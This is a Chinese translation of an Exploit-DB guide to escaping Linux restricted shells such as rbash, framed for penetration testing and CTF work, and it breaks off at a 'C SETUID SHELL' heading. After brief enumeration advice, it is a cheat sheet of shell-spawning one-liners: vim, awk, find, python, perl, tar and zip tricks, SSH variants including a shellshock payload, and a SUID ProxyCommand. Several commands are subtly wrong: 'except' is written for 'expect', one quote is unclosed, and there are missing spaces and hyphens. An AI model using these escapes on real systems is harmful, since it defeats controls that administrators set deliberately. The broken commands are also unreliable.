绕过Linux受限Shell环境的技巧

原文：https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

[1]引言
[2]枚举Linux环境
[3]常见的绕过技术
[4]基于编程语言的绕过技术
[5]高级绕过技术
[6]动手时间

引言

首先，让我们来了解一下什么是受限shell环境？所谓受限shell环境，指的是一个会阻止/限制某些命令（如cd、ls、echo等）或“阻止”SHELL、PATH、USER等环境变量的shell环境。有些时候，受限shell环境可能会阻止重定向输出操作符如>，>>，或者其他使用这些重定向的命令。实际上，常见的受限shell环境类型包括rbash、rksh和rsh。那么，读者可能会问：人们为什么要创建一个受限shell环境呢？原因如下所述：

1）提高安全性
2）防止受到黑客/渗透测试人员的攻击。
3）有时，系统管理员会创建一个受限shell环境，来防止受到某些危险命令误操作所带来的伤害。
4）用于CTF挑战赛（Root-me/hackthebox/vulnhub）。

枚举Linux环境

枚举是本文中最重要的内容。我们需要通过枚举Linux环境来考察可以绕过rbash做哪些事情。

我们需要枚举：

1）首先，我们必须检查有哪些可用的命令，如cd / ls / echo等。
2）我们必须检查诸如>、>>、<、|之类的操作符。
3）我们需要检查可用的编程语言，如perl、ruby、python等。
4）我们能够以root身份运行哪些命令（sudo -l）。
5）检查具有SUID权限的文件或命令。
6）必须检查当前所用的shell，具体命令为：echo $SHELL 。实际上，rbash的可能性为九成。
7）检查环境变量：可以使用env或printenv命令。

接下来，让我们来了解一下常见的绕过技术。

常见的绕过技术

下面，我们开始介绍一些常见的绕过技术。

1）如果允许使用“/”的话，则可以运行/bin/sh或/bin/bash。
2）如果可以运行cp命令，则可以将/bin/sh或/bin/bash复制到自己的目录中。
3) 使用 ftp > !/bin/sh 或者 !/bin/bash
4) 使用 gdb > !/bin/sh 或者 !/bin/bash
5) 使用 more/man/less > !/bin/sh 或者 !/bin/bash
6) 使用 vim > !/bin/sh 或者 !/bin/bash
7) 使用 rvim > :python import os; os.system("/bin/bash )
8) 使用 scp > scp -S /path/yourscript x y:
9) 使用 awk > awk 'BEGIN {system("/bin/sh 或者 /bin/bash")}'
10) 使用 find > find / -name test -exec /bin/sh 或者 /bin/bash \;

基于编程语言的绕过技术

现在，让我们看看一些基于编程语言的绕过技术。

1) 使用 except > except spawn sh，然后执行sh
2) 使用 python > python -c 'import os; os.system("/bin/sh")'
3) 使用 php > php -a ，然后执行 exec("sh -i");
4) 使用 perl > perl -e 'exec "/bin/sh";'
5) 使用 lua > os.execute('/bin/sh').
6) 使用 ruby > exec "/bin/sh"

现在让我们了解一些更加高级的绕过技术。

高级绕过技术

现在，让我们来学习一些更加龌龊的技术。

1)使用 ssh > ssh username@IP - t "/bin/sh" 或者 "/bin/bash"
2)使用 ssh2 > ssh username@IP -t "bash --noprofile"
3)使用 ssh3 > ssh username@IP -t "() { :; }; /bin/bash" (shellshock)
4)使用 ssh4 > ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1 (SUID)
5)使用 git > git help status > ，然后就可以运行 !/bin/bash了
6)使用 pico > pico -s "/bin/bash" ，然后就可以对 /bin/bash 执行写操作，最后执行 CTRL + T
7)使用 zip > zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c/bin/bash"
8)使用 tar > tar cf /dev/null testfile --checkpoint=1 --checkpointaction=exec=/bin/bash

C SETUID SHELL :